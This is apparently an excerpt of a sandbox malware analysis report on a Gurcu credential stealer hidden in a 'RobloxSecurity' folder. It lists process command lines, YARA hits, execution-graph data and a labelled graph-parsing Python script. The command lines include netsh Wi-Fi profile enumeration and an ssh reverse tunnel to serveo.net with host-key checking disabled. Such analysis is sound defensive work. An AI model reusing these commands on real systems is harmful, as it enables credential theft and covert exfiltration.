Commandline:cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]
Imagebase:0x7ff677710000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:13
Start time:16:17:15
Start date:10/02/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:14
Start time:16:17:15
Start date:10/02/2024
Path:C:\Windows\System32\chcp.com
Wow64 process (32bit):false
Commandline:chcp 65001
Imagebase:0x7ff6bf650000
File size:14'848 bytes
MD5 hash:33395C4732A49065EA72590B14B64F32
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:15
Start time:16:17:15
Start date:10/02/2024
Path:C:\Windows\System32\netsh.exe
Wow64 process (32bit):false
Commandline:netsh wlan show profiles
Imagebase:0x7ff6bc470000
File size:96'768 bytes
MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:16
Start time:16:17:15
Start date:10/02/2024
Path:C:\Windows\System32\findstr.exe
Wow64 process (32bit):false
Commandline:findstr /R /C:"[ ]:[ ]"
Imagebase:0x7ff6c7230000
File size:36'352 bytes
MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:17
Start time:16:17:16
Start date:10/02/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal
Imagebase:0x7ff677710000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:18
Start time:16:17:16
Start date:10/02/2024
Path:C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
Wow64 process (32bit):false
Commandline:C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
Imagebase:0x10dd5580000
File size:131'528 bytes
MD5 hash:869F82DF0992DC2F5155D8F69FD1C9CF
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:true

Target ID:19
Start time:16:17:16
Start date:10/02/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:20
Start time:16:17:16
Start date:10/02/2024
Path:C:\Windows\System32\chcp.com
Wow64 process (32bit):false
Commandline:chcp 65001
Imagebase:0x7ff6bf650000
File size:14'848 bytes
MD5 hash:33395C4732A49065EA72590B14B64F32
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:21
Start time:16:17:16
Start date:10/02/2024
Path:C:\Windows\System32\netsh.exe
Wow64 process (32bit):false
Commandline:netsh wlan show networks mode=bssid
Imagebase:0x7ff6bc470000
File size:96'768 bytes
MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:22
Start time:16:17:16
Start date:10/02/2024
Path:C:\Windows\System32\findstr.exe
Wow64 process (32bit):false
Commandline:findstr "SSID BSSID Signal"
Imagebase:0x7ff6c7230000
File size:36'352 bytes
MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:23
Start time:16:17:16
Start date:10/02/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]
Imagebase:0x7ff677710000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:24
Start time:16:17:16
Start date:10/02/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:25
Start time:16:17:16
Start date:10/02/2024
Path:C:\Windows\System32\chcp.com
Wow64 process (32bit):false
Commandline:chcp 65001
Imagebase:0x7ff6bf650000
File size:14'848 bytes
MD5 hash:33395C4732A49065EA72590B14B64F32
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:26
Start time:16:17:16
Start date:10/02/2024
Path:C:\Windows\System32\netsh.exe
Wow64 process (32bit):false
Commandline:netsh wlan show profiles
Imagebase:0x7ff6bc470000
File size:96'768 bytes
MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:27
Start time:16:17:16
Start date:10/02/2024
Path:C:\Windows\System32\findstr.exe
Wow64 process (32bit):false
Commandline:findstr /R /C:"[ ]:[ ]"
Imagebase:0x7ff6c7230000
File size:36'352 bytes
MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:28
Start time:16:17:17
Start date:10/02/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal
Imagebase:0x7ff677710000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:29
Start time:16:17:17
Start date:10/02/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

                                                                                                    Target ID:30
                                                                                                    Start time:16:17:17
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\chcp.com
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:chcp 65001
                                                                                                    Imagebase:0x7ff6bf650000
                                                                                                    File size:14'848 bytes
                                                                                                    MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:31
                                                                                                    Start time:16:17:17
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\netsh.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:netsh wlan show networks mode=bssid
                                                                                                    Imagebase:0x7ff6bc470000
                                                                                                    File size:96'768 bytes
                                                                                                    MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:32
                                                                                                    Start time:16:17:17
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\findstr.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:findstr "SSID BSSID Signal"
                                                                                                    Imagebase:0x7ff6c7230000
                                                                                                    File size:36'352 bytes
                                                                                                    MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:33
                                                                                                    Start time:16:17:17
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\OpenSSH\ssh.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net
                                                                                                    Imagebase:0x7ff734ff0000
                                                                                                    File size:946'176 bytes
                                                                                                    MD5 hash:C05426E6F6DFB30FB78FBA874A2FF7DC
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Target ID:34
                                                                                                    Start time:16:17:17
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Target ID:35
                                                                                                    Start time:16:17:18
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\OpenSSH\ssh.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net
                                                                                                    Imagebase:0x7ff734ff0000
                                                                                                    File size:946'176 bytes
                                                                                                    MD5 hash:C05426E6F6DFB30FB78FBA874A2FF7DC
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Target ID:36
                                                                                                    Start time:16:17:18
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false

                                                                                                    Target ID:41
                                                                                                    Start time:16:17:22
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 8072 -s 1632
                                                                                                    Imagebase:0x7ff6065e0000
                                                                                                    File size:570'736 bytes
                                                                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:42
                                                                                                    Start time:16:18:01
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    Imagebase:0x17a71230000
                                                                                                    File size:131'528 bytes
                                                                                                    MD5 hash:869F82DF0992DC2F5155D8F69FD1C9CF
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Has exited:true

                                                                                                    Target ID:44
                                                                                                    Start time:16:19:00
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    Imagebase:0x1ec7f190000
                                                                                                    File size:131'528 bytes
                                                                                                    MD5 hash:869F82DF0992DC2F5155D8F69FD1C9CF
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000002C.00000002.2953825020.000001EC01AD9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Has exited:true

                                                                                                    Target ID:45
                                                                                                    Start time:16:20:00
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    Imagebase:0x167cfae0000
                                                                                                    File size:131'528 bytes
                                                                                                    MD5 hash:869F82DF0992DC2F5155D8F69FD1C9CF
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 0000002D.00000002.3553295709.00000167D1889000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Has exited:true

                                                                                                    Target ID:46
                                                                                                    Start time:16:21:00
                                                                                                    Start date:10/02/2024
                                                                                                    Path:C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    Imagebase:0x1cf0ab30000
                                                                                                    File size:131'528 bytes
                                                                                                    MD5 hash:869F82DF0992DC2F5155D8F69FD1C9CF
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false


                                                                                                      Execution Graph

                                                                                                      Execution Coverage:11.2%
                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                      Signature Coverage:2.4%
                                                                                                      Total number of Nodes:578
                                                                                                      Total number of Limit Nodes:54
                                                                                                      execution_graph: node and edge data for the interactive graph viewer (not reproduced). Win32 API nodes appearing in the graph: GetModuleHandleW, LoadLibraryExW, DuplicateHandle, CallWindowProcW, SendMessageW, CreateWindowExW, CreateIconFromResourceEx, PostThreadMessageW, EnumThreadWindows, PostMessageW, CreateActCtxA, KiUserCallbackDispatcher.
41265->41280 41267->41259 41271 6257bfd 41268->41271 41269 6257c62 41269->41249 41270 6257d3f 41279 2b8e188 8 API calls 41270->41279 41271->41269 41271->41270 41275 6257da2 41271->41275 41272 6257d4d 41273 6254590 7 API calls 41272->41273 41274 6257d75 41272->41274 41273->41274 41274->41249 41275->41274 41276 6254590 7 API calls 41275->41276 41277 6257e47 41276->41277 41277->41274 41278 6257880 7 API calls 41277->41278 41278->41274 41279->41272 41282 625788b 41280->41282 41281 6259b32 41285 6259bdc 41281->41285 41295 6259b89 41281->41295 41315 6258dcc 7 API calls 41281->41315 41282->41281 41293 6259c10 41282->41293 41296 6257930 41282->41296 41284 6259bc2 41287 6257940 7 API calls 41284->41287 41292 6254590 7 API calls 41285->41292 41285->41293 41289 6259bce 41287->41289 41288 6259bb4 41309 6258ddc 41288->41309 41291 6258ddc 7 API calls 41289->41291 41291->41285 41292->41293 41293->41262 41295->41284 41302 6257940 41295->41302 41297 625793b 41296->41297 41299 6259c72 41297->41299 41316 6259ca0 41297->41316 41320 6259c8f 41297->41320 41298 6259c81 41298->41281 41299->41281 41304 625794b 41302->41304 41303 625b84e 41303->41288 41304->41303 41305 625b8a8 41304->41305 41306 6254590 7 API calls 41304->41306 41334 625a1b8 41305->41334 41306->41305 41310 6258de7 41309->41310 41311 6254590 7 API calls 41310->41311 41312 625b8a8 41311->41312 41313 625a1b8 SendMessageW 41312->41313 41314 625b8b9 41313->41314 41314->41284 41315->41295 41318 6259ca5 41316->41318 41317 6259d12 41317->41298 41318->41317 41324 6258df8 41318->41324 41322 6259c9e 41320->41322 41321 6259d12 41321->41298 41322->41321 41323 6258df8 3 API calls 41322->41323 41323->41321 41326 6258e03 41324->41326 41325 6259deb 41325->41317 41326->41325 41329 6258e50 41326->41329 41331 6258e5b 41329->41331 41330 6259de4 41330->41317 41331->41330 41332 625b510 CreateIconFromResourceEx CreateIconFromResourceEx 41331->41332 41333 625b4ff CreateIconFromResourceEx CreateIconFromResourceEx 41331->41333 41332->41330 
41333->41330 41335 625b8d0 SendMessageW 41334->41335 41336 625b8b9 41335->41336 41336->41288 41337 67e50ab 41338 67e50be 41337->41338 41342 67e5388 41338->41342 41345 67e5380 41338->41345 41339 67e50e1 41343 67e538e PostMessageW 41342->41343 41344 67e53f4 41343->41344 41344->41339 41346 67e538e PostMessageW 41345->41346 41347 67e5388 41345->41347 41348 67e53f4 41346->41348 41347->41346 41348->41339 41451 6254418 41452 6254428 41451->41452 41459 62559f8 41452->41459 41471 6255a50 41452->41471 41483 6255a60 41452->41483 41495 6259518 41452->41495 41501 6259508 41452->41501 41453 6254451 41462 62559fd 41459->41462 41461 6254590 7 API calls 41463 6255e6c 41461->41463 41469 6255cc4 41462->41469 41507 62556d8 41462->41507 41463->41453 41464 6255b45 41465 6254590 7 API calls 41464->41465 41470 6255bed 41464->41470 41466 6255bb7 41465->41466 41467 6254590 7 API calls 41466->41467 41467->41470 41468 6254590 7 API calls 41468->41469 41469->41461 41469->41463 41470->41468 41476 6255a03 41471->41476 41472 62556d8 7 API calls 41477 6255b45 41472->41477 41473 6255cc4 41474 6254590 7 API calls 41473->41474 41475 6255e6c 41473->41475 41474->41475 41475->41453 41476->41471 41476->41472 41476->41473 41478 6254590 7 API calls 41477->41478 41481 6255bed 41477->41481 41479 6255bb7 41478->41479 41480 6254590 7 API calls 41479->41480 41480->41481 41482 6254590 7 API calls 41481->41482 41482->41473 41488 6255a8c 41483->41488 41484 62556d8 7 API calls 41489 6255b45 41484->41489 41485 6255cc4 41486 6254590 7 API calls 41485->41486 41487 6255e6c 41485->41487 41486->41487 41487->41453 41488->41484 41488->41485 41490 6254590 7 API calls 41489->41490 41494 6255bed 41489->41494 41491 6255bb7 41490->41491 41492 6254590 7 API calls 41491->41492 41492->41494 41493 6254590 7 API calls 41493->41485 41494->41493 41496 625954d 41495->41496 41497 6255a60 7 API calls 41496->41497 41498 62595a2 41497->41498 41513 625590c 7 API calls 41498->41513 41500 62595a9 41500->41453 41502 6259512 41501->41502 41503 
6255a60 7 API calls 41502->41503 41504 62595a2 41503->41504 41514 625590c 7 API calls 41504->41514 41506 62595a9 41506->41453 41509 62556e3 41507->41509 41508 6254590 7 API calls 41512 6255fc9 41508->41512 41510 6254590 7 API calls 41509->41510 41511 6256007 41509->41511 41509->41512 41510->41512 41511->41464 41512->41508 41512->41511 41513->41500 41514->41506 41515 67efa80 DispatchMessageW 41516 67efaec 41515->41516 41517 67e6940 41518 67e695a 41517->41518 41521 67e696d 41517->41521 41523 67e59a4 41518->41523 41520 67e69b3 41521->41520 41522 67e59a4 OleInitialize 41521->41522 41522->41520 41524 67e59af 41523->41524 41525 67e69de 41524->41525 41528 67e6a18 41524->41528 41533 67e6a12 41524->41533 41525->41521 41530 67e6a40 41528->41530 41532 67e6a6c 41528->41532 41529 67e6a49 41529->41525 41530->41529 41538 67e5a44 41530->41538 41532->41525 41534 67e6a40 41533->41534 41537 67e6a6c 41533->41537 41535 67e6a49 41534->41535 41536 67e5a44 OleInitialize 41534->41536 41535->41525 41536->41537 41537->41525 41539 67e5a4f 41538->41539 41540 67e6d63 41539->41540 41542 67e5a60 41539->41542 41540->41532 41543 67e6d98 OleInitialize 41542->41543 41544 67e6dfc 41543->41544 41544->41540 41349 6ef04b0 41350 6ef04be 41349->41350 41354 6ef04e2 41350->41354 41359 6ef04f0 41350->41359 41351 6ef04d8 41355 6ef0518 41354->41355 41357 6ef076c 41354->41357 41356 6ef08f2 41355->41356 41364 6ef0ae8 41355->41364 41356->41351 41357->41351 41360 6ef076c 41359->41360 41361 6ef0518 41359->41361 41360->41351 41362 6ef08f2 41361->41362 41363 6ef0ae8 PostMessageW 41361->41363 41362->41351 41363->41360 41365 6ef0b23 41364->41365 41366 6ef0ba2 41365->41366 41370 6ef11cd 41365->41370 41375 6ef0f50 41365->41375 41380 6ef0f40 41365->41380 41366->41357 41371 6ef116d 41370->41371 41372 6ef114b 41370->41372 41371->41366 41372->41371 41385 6ef129f 41372->41385 41389 6ef12b0 41372->41389 41377 6ef0faa 41375->41377 41376 6ef116d 41376->41366 41377->41376 41378 6ef129f PostMessageW 41377->41378 41379 6ef12b0 
PostMessageW 41377->41379 41378->41376 41379->41376 41382 6ef0faa 41380->41382 41381 6ef116d 41381->41366 41382->41381 41383 6ef129f PostMessageW 41382->41383 41384 6ef12b0 PostMessageW 41382->41384 41383->41381 41384->41381 41386 6ef12a6 41385->41386 41387 6ef0238 PostMessageW 41386->41387 41388 6ef1363 41386->41388 41387->41388 41390 6ef12d8 41389->41390 41391 6ef0238 PostMessageW 41390->41391 41392 6ef1363 41390->41392 41391->41392
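Added example, not part of the Joe Sandbox report or of Joe Sandbox's own tooling: the execution graph in this report survives text extraction only as a flat token stream, in which a short decimal node id followed by a hex code address defines a node, trailing tokens on a node name the Win32 API it calls (or give an unresolved `N API calls` count), and `a->b` tokens are edges. The script below parses that stream and answers the question an analyst actually has about it, namely which APIs each entry node (no incoming edge) can reach. The `SAMPLE` string is an excerpt copied from this report's graph; the function names are this example's own, and the token rules are inferred from the export rather than documented by Joe Sandbox.

```python
"""Recover call-graph structure from a Joe Sandbox execution-graph text export.

Added example, not part of the report or of Joe Sandbox's own tooling. The
token rules below are inferred from the export as it appears in this report:
    <id> <hexaddr> [ApiName ...] [<N> API calls]   defines a node
    <id>-><id>                                     defines an edge
"""
import re
from collections import defaultdict, deque

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
ID_RE = re.compile(r"^\d{1,5}$")              # node ids: short decimal numbers
ADDR_RE = re.compile(r"^[0-9a-fA-F]{6,8}$")   # code addresses: 6-8 hex digits
API_RE = re.compile(r"^[A-Z][A-Za-z0-9]+$")   # Win32 export names (CreateWindowExW, ...)

# Constructed sample: an excerpt copied from this report's graph export. Node
# 41019 is referenced but never defined (its definition lies outside the
# excerpt), which is what a truncated report page looks like in practice.
SAMPLE = """
41109 67e47b0 41110 67e480d 41109->41110
41111 67e484b 41110->41111 41113 67e4858 41110->41113 41115 67e4853 41110->41115
41116 67e3b58 41111->41116 41113->41115 41120 67e3b68 41113->41120
41117 67e3b63 PostThreadMessageW 41116->41117 41119 67e4b1b 41117->41119 41119->41115
41121 67e3b73 41120->41121 41125 6ef2799 41121->41125 41126 6ef27a8 41125->41126
41133 6ef1754 41126->41133 41135 6ef2898 EnumThreadWindows 41133->41135
41515 67efa80 DispatchMessageW 41516 67efaec 41515->41516
41020 62591f6 41019->41020 41021 6250bfc 8 API calls 41020->41021
"""


def parse_graph(text):
    """Return (nodes, edges). nodes: id -> {"addr", "apis", "unresolved"};
    edges: list of (src_id, dst_id). Unknown tokens are skipped, not fatal."""
    tokens = text.split()
    nodes, edges = {}, []
    current, i, n = None, 0, len(tokens)
    while i < n:
        tok = tokens[i]
        edge = EDGE_RE.match(tok)
        if edge:
            edges.append(edge.groups())
            current = None              # labels never follow an edge
            i += 1
            continue
        if ID_RE.match(tok) and i + 1 < n and ADDR_RE.match(tokens[i + 1]):
            current = tok               # "<id> <hexaddr>" starts a node
            nodes[current] = {"addr": tokens[i + 1], "apis": [], "unresolved": 0}
            i += 2
            continue
        if current is not None:
            node = nodes[current]
            if tok.isdigit() and i + 1 < n and tokens[i + 1] == "API":
                node["unresolved"] += int(tok)   # "<N> API calls": callees not resolved
            elif API_RE.match(tok) and tok != "API":
                node["apis"].append(tok)
        i += 1
    return nodes, edges


def reachable_apis(nodes, edges):
    """Map each entry node (no incoming edge) to the sorted set of API names
    reachable from it, keyed by code address, which is what an analyst pivots on."""
    succ, has_pred = defaultdict(list), set()
    for src, dst in edges:
        succ[src].append(dst)
        has_pred.add(dst)
    result = {}
    for nid, node in nodes.items():
        if nid in has_pred:
            continue
        seen, queue, apis = {nid}, deque([nid]), set()
        while queue:
            cur = queue.popleft()
            apis.update(nodes.get(cur, {}).get("apis", ()))  # tolerate undefined ids
            for nxt in succ[cur]:
                if nxt not in seen:
                    seen.add(nxt)
                    queue.append(nxt)
        result[node["addr"]] = sorted(apis)
    return result


def api_summary(text):
    """Convenience wrapper: export text in, {entry_addr: [api, ...]} out."""
    nodes, edges = parse_graph(text)
    return reachable_apis(nodes, edges)


if __name__ == "__main__":
    nodes, edges = parse_graph(SAMPLE)
    for addr, apis in sorted(api_summary(SAMPLE).items()):
        print(f"{addr}: {', '.join(apis) or '(no resolved APIs)'}")
    unresolved = sum(v["unresolved"] for v in nodes.values())
    print(f"{len(nodes)} nodes, {len(edges)} edges, {unresolved} unresolved API calls")
```

Run against a pasted export it reports, for the excerpt, that the 67e47b0 path reaches PostThreadMessageW and EnumThreadWindows while 67efa80 only reaches DispatchMessageW; the unresolved count is kept separately because a node labelled "8 API calls" tells you the graph is incomplete, not that nothing sensitive is called there.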

Control-flow Graph: function at 6258e50 (rendered graph omitted; basic blocks span 6258e50-625abb8; internal calls to 625a064, 625af88, 625a070, 625a07c, 625a08c, 625b510 and 625b4ff).
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1819348559.0000000006250000.00000040.00000800.00020000.00000000.sdmp, Offset: 06250000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6250000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Hbq$Hbq$Hbq$Hbq$Hbq
                                                                                                      • API String ID: 0-1677660839
                                                                                                      • Opcode ID: d20d7db25de588cd9a6286dba3a0560d8e49b85436ad1511ac3ca29dea9c6e7f
                                                                                                      • Instruction ID: c1df44b6a37b84519349b9e6c2782bd0a8928b717756dbc1f2f376ee800644ce
                                                                                                      • Opcode Fuzzy Hash: d20d7db25de588cd9a6286dba3a0560d8e49b85436ad1511ac3ca29dea9c6e7f
                                                                                                      • Instruction Fuzzy Hash: D6427D70E102588FDB64DFB8C85179EBBF2BF84300F1185AAD809AB395DB349985CF95
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1820252857.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6ef0000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f1fbd254e66eebd3942ef651eecb2ed306e6cd76fd7dc62426af8c01b8431169
                                                                                                      • Instruction ID: 37f9e49b7c402f53a29faf1276adf9ef23d6a887ce566e3c911d041ed9ba8dc4
                                                                                                      • Opcode Fuzzy Hash: f1fbd254e66eebd3942ef651eecb2ed306e6cd76fd7dc62426af8c01b8431169
                                                                                                      • Instruction Fuzzy Hash: 99D1AE34B117008FDB95EB75C460B6EB7F7AF89704F1444AED24A8B291DB38E801CB51
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1819805628.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_67e0000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b0827ca549acea51bdddbba430b8f92415dce4a3be2a8651fe2d5856c99c0db6
                                                                                                      • Instruction ID: 02c735dcab02df55a2c5e5799f1ac1d4ac0525f8efa3c02acd758be0f0311cec
                                                                                                      • Opcode Fuzzy Hash: b0827ca549acea51bdddbba430b8f92415dce4a3be2a8651fe2d5856c99c0db6
                                                                                                      • Instruction Fuzzy Hash: 8DD13C74E00609CFEB54DFA9C848BADBBF2BF48304F15C568D409AF2A5DB749949CB81
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1819348559.0000000006250000.00000040.00000800.00020000.00000000.sdmp, Offset: 06250000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
